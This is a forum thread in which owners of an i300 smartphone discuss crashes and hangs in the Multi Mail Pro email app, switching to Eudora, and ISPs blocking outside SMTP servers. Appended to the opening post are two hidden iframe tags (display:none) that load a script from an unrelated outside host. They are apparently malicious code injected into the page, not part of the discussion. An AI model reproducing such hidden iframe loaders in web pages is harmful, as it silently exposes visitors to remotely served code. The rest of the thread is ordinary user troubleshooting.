+ Reply to Thread

Question Problems with Multi Mail?

What are people's experience using Multi Mail Pro from Actual Soft (now owned by Palm)?

I purchased and installed Multi Mail Pro and have experienced several problem (e.g. fatal errors, hard resets, unending hangs). Tech Support has had me uninstall/reinstall which solves the problem for a little while, but eventually I get hung again.

I think it happens when an email has an attachment. But it has also happended on sending email.

Anyone else having problems with Multi Mail?

I have started using Eudora, but there are some features in Multi Mail that I like.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

The only problem I experienced was opening some email attachments, but other than that I love the app.

Re: Problems with Multi Mail?

MultiMailPro has worked flawlessly on my I300

Originally posted by Lorax
    What are people's experience using Multi Mail Pro from Actual Soft (now owned by Palm)?

I purchased and installed Multi Mail Pro and have experienced several problem (e.g. fatal errors, hard resets, unending hangs). Tech Support has had me uninstall/reinstall which solves the problem for a little while, but eventually I get hung again.

I think it happens when an email has an attachment. But it has also happended on sending email.

Anyone else having problems with Multi Mail?

I have started using Eudora, but there are some features in Multi Mail that I like.

To those of you that indicated you did not have a problem with Multi Mail please let me know what version of the i300 you have....

When the phone pad is active select "version" from the "options" menu. My version is...

S/W
    S:I300.01.S.U106
    PDA:0108:2800

Just curious. I gave up on Multi Mail for the time being and began using Eudora. MM has been too unpredictable for me. I do not run hacks or anything out of the mian stream.

I have the same software version you do. MultiMail Pro has about 6 or 8 parts, did you load all the parts?

Originally posted by Lorax
    To those of you that indicated you did not have a problem with Multi Mail please let me know what version of the i300 you have....

When the phone pad is active select "version" from the "options" menu. My version is...

S/W
    S:I300.01.S.U106
    PDA:0108:2800

Just curious. I gave up on Multi Mail for the time being and began using Eudora. MM has been too unpredictable for me. I do not run hacks or anything out of the mian stream.

I tried it two ways.

By default the installer will install everything. I had problems under that configuration.

After a uninstalling I reinstalled everything except the apps related to printing (I do not do that from my i300). I still had the problems.

Palm (Actuate) does not have an answer.

Outgoing Mail Server Question

Will Sprint allow an outgoing mail server other than their own? I can't get Multimail to work with my Mindspring/Earthlink account using the Mindspring SMPT server.

Everything worked fine for me with MultiMail...until this past Tuesday (11/13). It hung when sending mail so I performed a reset using the 'paperclip' portion of the stylus tip. When the unit came back, it kept going on and off continuously. Nothing I did had any change until I answered Y to the 'Erase all data' question. All is fine now but I had to hotsync and restore everything.

That is the experience I had. However, Multi Mail would work for a few times and then enter that nasty bouncing screen mode. I had it setup to retrieve email from about 5 accounts (all POP3).

I like the attachment capabilitied of Multi Mail, but if it requires you to erase all data while you are on the road, it is worthless.

dtone,

I had the same experience except with iambic mail. Seems like it's a problem with the unit, not the mail package. I'm using eudora mail now it works fine.

alternate SMTP mail server

OUCH! I haven't tried it yet, but I just had a horrible thought... Earthlink explicitly blocks access to non-Earthlink SMTP servers, and for all intents and purposes Sprint and Earthlink are practically one and the same, so it's quite possible that wireless internet access from SPCS might (now, or without warning in the future) suddenly come under the same restrictions as those imposed by Earthlink on its customers...

Dan

Re: alternate SMTP mail server

Originally posted by miamicanes
    so it's quite possible that wireless internet access from SPCS might (now, or without warning in the future) suddenly come under the same restrictions as those imposed by Earthlink on its customers...
    I have Eudora configured to send and receive through my Exchange 2000 server at home and it works fine...

I have a similiar setup as well. My ISP blocks SMTP traffic when you are not iusing one of their IPs (and rightfully so, to cut down on Spam).

I use an SMTP relay on my home computer that requires a successful POP3 check first. Works great and insures that my computer will never be used as relay for spam.

Eventually, some of these ISPs will adopt similiar techniques for their SMTP traffic (some kind of authorization scheme).

Good Luck!
    Doug

K7AAY Treo 650/Cing & Nokia9300/TMo johnbartley's Avatar

Outbound SMTP email blocked

How do you send email from the i300 w/ Eudora via Sprint's ISP? My home ISP blocked it last weekend, and the airbridge.net ISP I used before is now also blocked.

in order to send emails from my I300 i dial up using earthlink as my ISP as opposed to Sprint. Since i am connecting through earthlink and not sprint, i have no trouble sending email. as miamicanes stated "Earthlink explicitly blocks access to non-Earthlink SMTP servers", so logging onto eartlink solves the problem, and you get just as good of a connection.

I use MultiMail Pro to send/recieve emails on my I300.